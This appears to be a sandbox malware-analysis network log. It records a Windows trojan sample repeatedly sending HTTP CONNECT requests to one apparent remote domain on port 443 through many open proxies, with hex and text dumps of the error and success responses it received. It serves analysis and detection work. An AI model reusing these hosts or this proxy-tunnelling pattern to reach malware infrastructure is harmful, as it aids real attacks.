                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 32 30 31 37 31 30 38 36 40 63 65 2e 70 75 63 6d 6d 2e 65 64 75 2e 64 6f 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at 20171086@ce.pucmm.edu.do to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1255192.168.2.853562188.164.193.178378425828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.400161028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.491740942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.492543936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.492309093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1256192.168.2.853698202.151.176.6180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.404215097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.288737059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.695071936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.491944075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.788829088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.991816998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1257192.168.2.853781104.25.184.189805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.437058926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.525427103 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1258192.168.2.85372158.234.116.19781935828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.448008060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1259192.168.2.853767148.72.23.13529115828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.483680964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.898121119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.379443884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.382627010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.149532080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.882695913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.548687935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.898353100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.694900990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1260192.168.2.853869104.22.37.236805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.499958992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.588484049 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1261192.168.2.853797109.238.12.156298345828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.526639938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.991909027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.679430962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.882582903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.991836071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.195127010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1262192.168.2.853662184.170.248.541455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.542882919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1263192.168.2.851695107.173.154.83499915828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.543313026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.694906950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.695488930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.789078951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:56.788466930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:08.788451910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1264192.168.2.853559117.54.114.35805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.543708086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1265192.168.2.85338798.178.72.21109195828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.545515060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1266192.168.2.853816206.220.175.241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.548536062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1267192.168.2.85377791.202.230.21980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.554831982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1268192.168.2.853912104.16.106.234805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.555680037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.644862890 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1269192.168.2.853625111.3.102.135300015828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.563942909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1270192.168.2.85375220.205.61.143805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.577094078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.879959106 CET319INHTTP/1.1 403 Forbidden
                                                                                Server: squid
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 17
                                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                X-Cache: MISS from cdn-fintech.info
                                                                                X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                Connection: keep-alive
                                                                                Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                Data Ascii: ERR_ACCESS_DENIED


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1271192.168.2.853935104.27.26.29805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.588159084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.676368952 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1272192.168.2.853582177.53.221.89441965828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.588505983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1273192.168.2.85373727.65.116.24310805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.589495897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1274192.168.2.853948104.16.109.207805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.589850903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.676922083 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1275192.168.2.853725115.127.107.21810855828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.591114044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1276192.168.2.853941152.32.148.23331285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.591237068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.898121119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.379278898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.085673094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.398189068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.693334103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.991846085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.398466110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.288917065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1277192.168.2.85383681.177.6.6831285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.608997107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.179367065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.819915056 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
